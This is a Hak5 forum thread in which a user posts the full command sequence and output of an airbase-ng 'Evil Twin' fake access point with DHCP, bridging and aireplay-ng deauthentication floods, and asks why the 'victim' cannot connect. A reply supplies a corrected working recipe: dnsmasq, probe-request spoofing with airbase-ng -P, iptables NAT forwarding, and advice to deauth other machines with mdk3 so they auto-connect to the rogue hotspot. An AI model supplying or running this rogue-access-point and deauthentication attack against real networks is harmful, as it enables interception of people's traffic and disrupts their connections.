Jump to content
Hak5 Forums
asciighost

Airbase-ng AP doesn't let my victim connect

Recommended Posts

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue.

Note:i have tried iptables and echo 1 it didnt help

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background proccesses that can interfere with the work
airmon-ng check wlan0mon(assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

 

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0
{

option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.10 192.168.1.200;
default-lease-time 600;
max-lease-time 7200;

 

}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:~# brctl addbr evil \\Name of the bridge i made
root@kali:~# brctl addif evil eth0 \\my ethernet connection
root@kali:~# brctl addif evil at0
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig evil up
Starting DHCP server
root@kali:~# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:~# service isc-dhcp-server restart
root@kali:~# service isc-dhcp-server status
? isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
Docs: man:systemd-sysv-generator(8)
Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/isc-dhcp-server.service
+-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd2061: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server.

 

/etc/init.d/isc-dhcp-server start
ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

Share this post


Link to post
Share on other sites

looks like your trying to deauth and force clients to reconnect to airbase-ng

 

first confirm that a machine can connect to this access point and establish a proper ip.

 

Dnsmasq is quicker and cleaner...

Edited by i8igmac

Share this post


Link to post
Share on other sites
10 hours ago, asciighost said:

@i8igmac i stop deauth after 1 min and i try to connect my phone manually and it doesnt connect

I don't think you have it properly setup. I can try to post commands from memory... (today on my lunch break)

 

 

Share this post


Link to post
Share on other sites

I use airbase-ng as a quick generic hotspot, it works with almost any wifi card. airbase-ng can also be used to spoof all probe requests with the use of -P -c 30

 

lets assume you have 2 devices.

 

One device is simply your internet source and the second device will be your evil hotspot.

 

I will assume your already connected to the internet with device 1. It can be a wifi connection or Ethernet...(eth0) in this example.

 

echo 'interface=at0' > /etc/dnsmasq.conf
echo 'dhcp-range=192.168.69.50,192.168.69.150,12h' >> /etc/dnsmasq.conf

airmon-ng start wlan0

airbase-ng -P -c 30 wlan0mon

[Open new console]

ifconfig at0 up 192.168.69.1

dnsmasq

 

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

 

you will need to change eth0 to the proper internet device name.

at this point if you check ifconfig, you should see at0 has ip address of 192.168.69.1 and you should have 2 process running (airbase-ng) and (dnsmasq)

 

you can now deauth other machines( I would use mdk3 for deauth) if the machine is outdated enough it will auto connect to your airbase-ng assuming that signal strength is higher. 

 

edit. you may also need to service stop network-mamager 

Edited by i8igmac

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×